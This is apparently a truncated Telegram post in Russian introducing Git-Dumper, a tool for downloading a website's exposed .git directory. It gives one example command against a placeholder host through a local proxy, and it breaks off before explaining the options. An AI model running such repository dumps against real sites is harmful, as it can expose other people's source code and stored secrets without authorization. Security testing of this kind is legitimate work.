Git-Dumper поддерживает несколько параметров, которые упрощают его использование:
Пример использования с опциями:
python3 git-dumper.py http://example.com/.git/ output-folder -r -p http://127.0.0.1:8080
В данном примере инструмент:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤7🔥6😁2